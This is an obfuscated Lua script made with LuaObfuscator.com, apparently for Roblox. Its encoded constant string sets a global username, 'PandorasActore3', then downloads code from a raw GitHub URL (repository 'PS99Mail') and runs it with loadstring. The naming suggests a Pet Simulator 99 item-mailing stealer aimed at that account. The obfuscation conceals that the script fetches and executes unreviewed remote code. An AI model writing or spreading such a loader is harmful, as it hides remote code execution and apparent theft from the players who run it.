--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=v2(v0(v30,16));if v19 then local v92=0;local v93;while true do if (v92==1) then return v93;end if (v92==0) then v93=v5(v83,v19);v19=nil;v92=1;end end else return v83;end end end);local function v20(v31,v32,v33)if v33 then local v84=0 + 0 ;local v85;while true do if (v84==(0 + 0)) then v85=(v31/((5 -3)^(v32-(2 -1))))%((2 + 0)^(((v33-(1 -0)) -(v32-(2 -1))) + ((2699 -2079) -(555 + 64)))) ;return v85-(v85%((1049 -(32 + 85)) -(857 + 74))) ;end end else local v86=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v86 + v86))>=v86) and ((1246 + 25) -(226 + 1044))) or 0 ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 + 0 ;local v36;local v37;while true do if (v35==(958 -(892 + (258 -193)))) then return (v37 * (610 -354)) + v36 ;end if (v35==(0 -(952 -(802 + 150)))) then v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (3 -1) ;v35=1;end end end local function v23()local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (1001 -(915 + 82)) ;v38=2 -1 ;end if (v38==((1 -0) + 0 + 0)) then return (v42 * ((39204070 -17139640) -5287214)) + (v41 * (66723 -(1069 + 118 + 0))) + (v40 * (580 -324)) + v39 ;end end end local function v24()local v43=v23();local v44=v23();local v45=792 -(368 + 423) ;local v46=(v20(v44,3 -(1 + 1) ,38 -(10 + 8) ) * (2^(122 -90))) + v43 ;local v47=v20(v44,463 -(416 + 26) ,98 -67 );local v48=((v20(v44,14 + 18 )==(1 -0)) and  -(439 -(145 + 293))) or (431 -(44 + 386)) ;if (v47==(1486 -(998 + 488))) then if (v46==(0 + 0)) then return v48 * (0 + 0) ;else v47=(274 + 499) -(201 + 571) ;v45=1138 -(116 + 1022) ;end elseif (v47==((9407 -(261 + 624)) -6475)) then return ((v46==0) and (v48 * ((1 + 0)/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(3632 -(4635 -2026)) ) * (v45 + (v46/((861 -(814 + 45))^((1207 -(1020 + 60)) -75)))) ;end local function v25(v49)local v50=0;local v51;local v52;while true do if (v50==(1425 -(630 + 793))) then v52={};for v94=3 -2 , #v51 do v52[v94]=v2(v1(v3(v51,v94,v94)));end v50=14 -11 ;end if (v50==(2 + 1)) then return v6(v52);end if (v50==(0 -(0 + 0))) then v51=nil;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=1748 -(760 + 987) ;end if (v50==(1914 -(1789 + 124))) then v51=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;v50=(2113 -1345) -(745 + (82 -61)) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if ((2 -1)~=v53) then else local v89=0;while true do if (v89~=(0 -0)) then else v56=nil;v57=nil;v89=1;end if (v89==1) then v53=1 + 1 ;break;end end end if (v53==4) then while true do if (v54~=(1 -0)) then else local v102=65 -(30 + 35) ;local v103;while true do if (v102==(0 + 0)) then v103=1257 -(1043 + 214) ;while true do if ((0 -0)==v103) then v57=nil;v58=nil;v103=1;end if (v103~=(1213 -(323 + 889))) then else v54=5 -3 ;break;end end break;end end end if (v54==0) then local v104=580 -(361 + 219) ;while true do if (v104==0) then v55=320 -(53 + 267) ;v56=nil;v104=1 + 0 ;end if (v104==(414 -(15 + 398))) then v54=1;break;end end end if ((984 -(18 + 964))==v54) then v59=nil;v60=nil;v54=3;end if (v54==3) then v61=nil;while true do local v105=0;local v106;local v107;while true do if (v105~=(3 -2)) then else while true do if ((0 + 0)~=v106) then else v107=0 + 0 ;while true do if (v107~=(850 -(20 + 830))) then else local v149=0;local v150;while true do if (0~=v149) then else v150=0 + 0 ;while true do if (v150==(126 -(116 + 10))) then if (v55~=(0 + 0)) then else local v181=738 -(542 + 196) ;local v182;while true do if (v181~=0) then else v182=0;while true do if (v182~=0) then else v56={};v57={};v182=1;end if ((1 -0)~=v182) then else v58={};v55=1;break;end end break;end end end if ((1 + 0)~=v55) then else local v183=0;while true do if (v183~=(0 + 0)) then else v59={v56,v57,nil,v58};v60=v23();v183=2 -1 ;end if (v183~=(2 -1)) then else v61={};v55=1553 -(1126 + 425) ;break;end end end v150=406 -(118 + 287) ;end if (v150~=1) then else v107=1;break;end end break;end end end if (v107==1) then if (v55==2) then local v159=0;while true do if (v159==(0 -0)) then for v169=1,v60 do local v170=0;local v171;local v172;local v173;local v174;while true do if (v170==1) then local v184=1121 -(118 + 1003) ;while true do if (v184~=(2 -1)) then else v170=379 -(142 + 235) ;break;end if (v184~=0) then else v173=nil;v174=nil;v184=1;end end end if (2~=v170) then else while true do if (v171~=0) then else local v188=0 -0 ;local v189;while true do if (v188==0) then v189=0;while true do if (v189==1) then v171=1;break;end if (v189~=0) then else v172=0;v173=nil;v189=1 + 0 ;end end break;end end end if ((978 -(553 + 424))~=v171) then else v174=nil;while true do if (v172~=0) then else local v199=0;local v200;while true do if ((0 -0)~=v199) then else v200=0;while true do if (v200~=0) then else local v203=0 + 0 ;local v204;while true do if (v203==(0 + 0)) then v204=0 + 0 ;while true do if (v204~=(0 + 0)) then else v173=v21();v174=nil;v204=1;end if (v204~=(1 + 0)) then else v200=2 -1 ;break;end end break;end end end if (v200==(2 -1)) then v172=1;break;end end break;end end end if (1==v172) then if (v173==1) then v174=v21()~=0 ;elseif (v173==(4 -2)) then v174=v24();elseif (v173~=3) then else v174=v25();end v61[v169]=v174;break;end end break;end end break;end if (v170~=0) then else local v185=0 + 0 ;while true do if (v185==0) then v171=0;v172=nil;v185=1;end if (v185==1) then v170=4 -3 ;break;end end end end end v59[756 -(239 + 514) ]=v21();v159=1;end if (v159==(1 + 0)) then for v175=1,v23() do local v176=0;local v177;local v178;while true do if (v176==1) then while true do if (v177==0) then v178=v21();if (v20(v178,1,1330 -(797 + 532) )~=(0 + 0)) then else local v192=0;local v193;local v194;local v195;local v196;local v197;local v198;while true do if (v192==(0 + 0)) then v193=0 -0 ;v194=nil;v192=1203 -(373 + 829) ;end if (v192~=2) then else v197=nil;v198=nil;v192=734 -(476 + 255) ;end if (v192==3) then while true do if (v193~=(1131 -(369 + 761))) then else local v202=0 + 0 ;while true do if (v202~=(1 -0)) then else v193=3 -1 ;break;end if (v202~=0) then else v196=nil;v197=nil;v202=1;end end end if (v193~=(240 -(64 + 174))) then else v198=nil;while true do if (0==v194) then v195=0 + 0 ;v196=nil;v194=1 -0 ;end if (v194==1) then local v205=0;local v206;while true do if (v205~=(336 -(144 + 192))) then else v206=0;while true do if (v206~=1) then else v194=2;break;end if (v206==(216 -(42 + 174))) then local v219=0;while true do if (v219==0) then v197=nil;v198=nil;v219=1 + 0 ;end if (v219~=(1 + 0)) then else v206=1;break;end end end end break;end end end if (v194~=2) then else while true do if (v195==2) then local v207=0 + 0 ;local v208;local v209;while true do if (v207==1) then while true do if (v208~=(1504 -(363 + 1141))) then else v209=1580 -(1183 + 397) ;while true do if (v209==(0 -0)) then local v220=0 + 0 ;while true do if (v220~=0) then else if (v20(v197,1 + 0 ,1)==1) then v198[2]=v61[v198[1977 -(1913 + 62) ]];end if (v20(v197,2 + 0 ,5 -3 )~=1) then else v198[3]=v61[v198[3]];end v220=1934 -(565 + 1368) ;end if (v220~=1) then else v209=1;break;end end end if (v209~=(3 -2)) then else v195=3;break;end end break;end end break;end if (v207~=(1661 -(1477 + 184))) then else v208=0;v209=nil;v207=1;end end end if (v195~=0) then else local v210=0 -0 ;local v211;local v212;while true do if (v210==(1 + 0)) then while true do if (v211==0) then v212=856 -(564 + 292) ;while true do if ((1 -0)~=v212) then else v195=2 -1 ;break;end if (0==v212) then local v221=0;local v222;while true do if (v221==(304 -(244 + 60))) then v222=0 + 0 ;while true do if (v222==(477 -(41 + 435))) then v212=1;break;end if (v222~=(1001 -(938 + 63))) then else local v229=0 + 0 ;while true do if (v229~=0) then else v196=v20(v178,1127 -(936 + 189) ,3);v197=v20(v178,2 + 2 ,6);v229=1;end if (v229==(1614 -(1565 + 48))) then v222=1 + 0 ;break;end end end end break;end end end end break;end end break;end if (v210~=(1138 -(782 + 356))) then else v211=0;v212=nil;v210=1;end end end if (3==v195) then if (v20(v197,3,3)==(268 -(176 + 91))) then v198[4]=v61[v198[10 -6 ]];end v56[v175]=v198;break;end if (v195~=(1 -0)) then else local v214=1092 -(975 + 117) ;local v215;local v216;while true do if (v214==1) then while true do if (v215==0) then v216=0;while true do if (v216==0) then local v223=0;while true do if (v223~=1) then else v216=1;break;end if (v223~=(1875 -(157 + 1718))) then else local v224=0;while true do if (v224~=0) then else v198={v22(),v22(),nil,nil};if (v196==(1018 -(697 + 321))) then local v230=0 -0 ;local v231;while true do if (v230==(0 -0)) then v231=0 -0 ;while true do if (v231~=0) then else v198[2 + 1 ]=v22();v198[4]=v22();break;end end break;end end elseif (v196==1) then v198[3]=v23();elseif (v196==(3 -1)) then v198[7 -4 ]=v23() -((1229 -(322 + 905))^(627 -(602 + 9))) ;elseif (v196==(1192 -(449 + 740))) then local v236=872 -(826 + 46) ;while true do if (v236==(947 -(245 + 702))) then v198[3]=v23() -((6 -4)^(6 + 10)) ;v198[4]=v22();break;end end end v224=1899 -(260 + 1638) ;end if (v224==(441 -(382 + 58))) then v223=3 -2 ;break;end end end end end if (v216==1) then v195=2;break;end end break;end end break;end if (v214==(0 + 0)) then v215=0;v216=nil;v214=1;end end end end break;end end break;end if (v193~=(0 -0)) then else v194=0 -0 ;v195=nil;v193=1;end end break;end if (v192==(1206 -(902 + 303))) then v195=nil;v196=nil;v192=3 -1 ;end end end break;end end break;end if (v176~=(0 -0)) then else local v186=0 + 0 ;local v187;while true do if (v186==(1690 -(1121 + 569))) then v187=214 -(22 + 192) ;while true do if (v187~=(684 -(483 + 200))) then else v176=1464 -(1404 + 59) ;break;end if (v187==(0 -0)) then v177=0;v178=nil;v187=1 -0 ;end end break;end end end end end v55=768 -(468 + 297) ;break;end end end if (3~=v55) then else local v160=562 -(334 + 228) ;local v161;local v162;while true do if ((3 -2)~=v160) then else while true do if (v161~=0) then else v162=0 -0 ;while true do if (v162~=0) then else for v190=1,v23() do v57[v190-1 ]=v28();end return v59;end end break;end end break;end if (0~=v160) then else v161=0 -0 ;v162=nil;v160=1;end end end break;end end break;end end break;end if (v105==0) then v106=0;v107=nil;v105=1 + 0 ;end end end break;end end break;end if (v53==0) then local v90=0;while true do if ((236 -(141 + 95))~=v90) then else v54=0;v55=nil;v90=1;end if (v90~=(1 + 0)) then else v53=1;break;end end end if (v53~=3) then else local v91=0 -0 ;while true do if (v91==0) then v60=nil;v61=nil;v91=1;end if (v91==(2 -1)) then v53=4;break;end end end if (2~=v53) then else v58=nil;v59=nil;v53=1 + 2 ;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v87=0,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v88=0;while true do if (v88==0) then v80=v68[v72];v81=v80[1];v88=1;end if (v88==1) then if (v81<=10) then if (v81<=4) then if (v81<=1) then if (v81>0) then v64[v80[3]]=v78[v80[2]];else v72=v80[3];end elseif (v81<=2) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end elseif (v81==3) then v64[v80[3]]=v78[v80[2]];else do return;end end elseif (v81<=7) then if (v81<=5) then for v119=v80[2],v80[3] do v78[v119]=nil;end elseif (v81>6) then v72=v80[3];elseif ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end elseif (v81<=8) then v78[v80[2]]=v80[3];elseif (v81==9) then local v129=v80[2];local v130=v78[v80[3]];v78[v129 + 1 ]=v130;v78[v129]=v130[v80[4]];else local v134=0;local v135;local v136;local v137;local v138;while true do if (v134==1) then v73=(v137 + v135) -1 ;v138=0;v134=2;end if (v134==0) then v135=v80[2];v136,v137=v71(v78[v135](v13(v78,v135 + 1 ,v80[3])));v134=1;end if (v134==2) then for v166=v135,v73 do local v167=0;while true do if (v167==0) then v138=v138 + 1 ;v78[v166]=v136[v138];break;end end end break;end end end elseif (v81<=15) then if (v81<=12) then if (v81>11) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else local v113=v80[2];v78[v113]=v78[v113](v13(v78,v113 + 1 ,v73));end elseif (v81<=13) then v78[v80[2]]();elseif (v81>14) then local v140=0;local v141;while true do if (v140==0) then v141=v80[2];v78[v141]=v78[v141](v13(v78,v141 + 1 ,v73));break;end end else local v142=v80[2];local v143=v78[v80[3]];v78[v142 + 1 ]=v143;v78[v142]=v143[v80[4]];end elseif (v81<=18) then if (v81<=16) then do return;end elseif (v81>17) then v78[v80[2]]=v80[3];else for v151=v80[2],v80[3] do v78[v151]=nil;end end elseif (v81<=19) then local v115=v80[2];local v116,v117=v71(v78[v115](v13(v78,v115 + 1 ,v80[3])));v73=(v117 + v115) -1 ;local v118=0;for v121=v115,v73 do local v122=0;while true do if (0==v122) then v118=v118 + 1 ;v78[v121]=v116[v118];break;end end end elseif (v81==20) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else v78[v80[2]]();end v72=v72 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D65030F3O0050616E646F7261734163746F726533030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O0012083O00014O0005000100013O0026143O0002000100010004073O00020001001208000100013O00261400010005000100010004073O00050001001208000200033O001203000200023O001202000200043O001202000300053O002009000300030006001208000500074O000A000300054O000F00023O00022O000D0002000100010004073O001400010004073O000500010004073O001400010004073O000200012O00043O00017O00",v9(),...);
